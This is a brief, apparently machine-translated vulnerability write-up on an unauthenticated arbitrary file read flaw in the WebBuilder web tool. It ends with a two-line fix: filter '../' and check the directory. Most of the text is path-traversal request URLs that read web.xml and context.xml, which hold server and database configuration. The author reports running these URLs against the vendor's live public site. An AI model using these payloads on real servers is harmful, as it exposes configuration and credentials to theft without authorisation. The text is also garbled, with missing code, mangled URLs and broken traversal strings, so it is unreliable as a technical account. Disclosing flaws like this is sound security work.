Open-source Web Application Development Tool WebBuilder Arbitrary File Reading and repair

Open-source Web Application Development Tool WebBuilder Arbitrary File Reading and repair

Open-source Web Application Development Tool WebBuilder has the Arbitrary File Reading Vulnerability, which can leak key information such as server and database configuration.

Methods In the code can be used to read files from user-controlled paths:

 

View the database. The xwl that calls this method does not require logon verification. If you do not have the permission, you can also access it:
 

 

Therefore, access this URL:

The path where the Code reads the file is webbuilder/docs/. First, try to access the file in this folder:

Http: // localhost: 8080/wb/main? Xwl1_13o1avuenbsf&dir;@index.txt
 

Modify the dir parameter without filtering ../. For example, submit the web. xml Path:

Http: // localhost: 8080/wb/main? Xwl = 13O1AVUENBSF & dir = @.../WEB-INF/web. xml
 

Try again:

Http: // localhost: 8080/wb/main? Xwl = 13O1AVUENBSF & dir = @.../META-INF/context. xml
 

Test it on the official online user site of WebBuilder:

Http://www.putdb.com/main? Xwl = 13O1AVUENBSF & dir = @.../WEB-INF/web. xml
 

Http://www.putdb.com/main? Xwl = 13O1AVUENBSF & dir = @.../META-INF/context. xml
 

 

Solution:

1. filter ../.

2. Check the directory when reading the file.